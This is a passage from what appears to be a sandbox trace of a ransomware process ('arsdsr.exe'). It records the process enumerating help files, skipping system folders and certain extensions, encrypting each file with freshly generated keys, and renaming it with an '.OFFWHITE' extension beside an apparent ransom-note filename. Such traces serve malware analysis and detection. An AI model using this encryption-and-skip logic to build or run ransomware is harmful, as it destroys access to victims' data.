Help\\MS.INFOPATH.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" [0147.406] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.406] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.406] PathFindExtensionW (pszPath="MS.INFOPATH.14.1033.hxn") returned=".hxn" [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.406] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.406] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.406] GetProcessHeap () returned 0x500000 [0147.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526bc8 [0147.406] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.419] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=344) returned 1 [0147.419] GetProcessHeap () returned 0x500000 [0147.419] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.419] GetProcessHeap () returned 0x500000 [0147.419] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.419] GetProcessHeap () returned 0x500000 [0147.419] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.419] GetProcessHeap () returned 0x500000 [0147.419] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.419] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.419] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.419] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.419] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.420] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.420] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.420] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.420] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.420] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.420] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.420] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.420] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.420] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x158, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.420] SetLastError (dwErrCode=0x0) [0147.420] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.422] GetLastError () returned 0x0 [0147.422] GetLastError () returned 0x0 [0147.422] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x258, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.422] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.422] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x358, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.422] WriteFile (in: hFile=0xb0, lpBuffer=0x526bc8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526bc8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.422] GetProcessHeap () returned 0x500000 [0147.422] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x158) returned 0x51d650 [0147.422] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.422] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x158, lpOverlapped=0x0) returned 1 [0147.422] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.422] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x158, lpOverlapped=0x0) returned 1 [0147.423] GetProcessHeap () returned 0x500000 [0147.423] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.423] CloseHandle (hObject=0xb0) returned 1 [0147.423] GetProcessHeap () returned 0x500000 [0147.423] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.423] GetProcessHeap () returned 0x500000 [0147.423] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.423] GetProcessHeap () returned 0x500000 [0147.423] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.423] GetProcessHeap () returned 0x500000 [0147.423] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.423] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" [0147.423] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.OFFWHITE" [0147.423] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn.offwhite")) returned 1 [0147.424] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1146cbb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.INFOPATHEDITOR.14.1033.hxn", cAlternateFileName="MSINFO~2.HXN")) returned 1 [0147.424] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".") returned 1 [0147.424] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="..") returned 1 [0147.424] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="...") returned 1 [0147.424] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="windows") returned -1 [0147.424] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.424] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="rsa") returned -1 [0147.424] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.424] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="programdata") returned -1 [0147.424] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="appdata") returned 1 [0147.424] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="program files") returned -1 [0147.424] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.424] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.424] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.INFOPATHEDITOR.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" [0147.425] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.425] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.425] PathFindExtensionW (pszPath="MS.INFOPATHEDITOR.14.1033.hxn") returned=".hxn" [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.425] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.425] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.425] GetProcessHeap () returned 0x500000 [0147.425] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526bd8 [0147.425] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.426] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=380) returned 1 [0147.426] GetProcessHeap () returned 0x500000 [0147.426] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.426] GetProcessHeap () returned 0x500000 [0147.426] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.426] GetProcessHeap () returned 0x500000 [0147.426] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.426] GetProcessHeap () returned 0x500000 [0147.426] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.426] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.426] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.426] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.426] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.426] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.426] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.426] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.426] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.426] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.427] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.427] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.427] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.427] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x17c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.427] SetLastError (dwErrCode=0x0) [0147.427] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.429] GetLastError () returned 0x0 [0147.429] GetLastError () returned 0x0 [0147.429] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x27c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.429] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.429] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x37c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.429] WriteFile (in: hFile=0xb0, lpBuffer=0x526bd8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526bd8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.429] GetProcessHeap () returned 0x500000 [0147.429] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x17c) returned 0x52ebe8 [0147.429] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.429] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x17c, lpOverlapped=0x0) returned 1 [0147.429] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.429] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x17c, lpOverlapped=0x0) returned 1 [0147.429] GetProcessHeap () returned 0x500000 [0147.429] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.430] CloseHandle (hObject=0xb0) returned 1 [0147.430] GetProcessHeap () returned 0x500000 [0147.430] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.430] GetProcessHeap () returned 0x500000 [0147.430] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.430] GetProcessHeap () returned 0x500000 [0147.430] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.430] GetProcessHeap () returned 0x500000 [0147.430] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.430] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" [0147.430] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.OFFWHITE" [0147.430] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn.offwhite")) returned 1 [0147.431] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.MSACCESS.14.1033.hxn", cAlternateFileName="MSMSAC~1.HXN")) returned 1 [0147.431] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2=".") returned 1 [0147.431] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="..") returned 1 [0147.431] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="...") returned 1 [0147.431] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="windows") returned -1 [0147.431] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.431] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="rsa") returned -1 [0147.431] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.431] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="programdata") returned -1 [0147.431] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="appdata") returned 1 [0147.431] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="program files") returned -1 [0147.431] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.431] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.431] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.MSACCESS.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" [0147.431] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.431] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.431] PathFindExtensionW (pszPath="MS.MSACCESS.14.1033.hxn") returned=".hxn" [0147.431] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.431] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.431] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.431] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.431] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.432] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.432] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.432] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.432] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.432] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.432] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.432] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.432] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.432] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.432] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.432] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.432] GetProcessHeap () returned 0x500000 [0147.432] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526be8 [0147.432] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.445] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=344) returned 1 [0147.445] GetProcessHeap () returned 0x500000 [0147.445] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.445] GetProcessHeap () returned 0x500000 [0147.445] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.445] GetProcessHeap () returned 0x500000 [0147.445] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.445] GetProcessHeap () returned 0x500000 [0147.445] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.445] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.445] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.445] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.445] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.445] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.445] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.445] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.445] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.445] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.446] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.446] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.446] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.446] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x158, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.446] SetLastError (dwErrCode=0x0) [0147.446] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.447] GetLastError () returned 0x0 [0147.447] GetLastError () returned 0x0 [0147.448] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x258, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.448] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.448] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x358, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.448] WriteFile (in: hFile=0xb0, lpBuffer=0x526be8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526be8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.448] GetProcessHeap () returned 0x500000 [0147.448] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x158) returned 0x51d650 [0147.448] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.448] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: 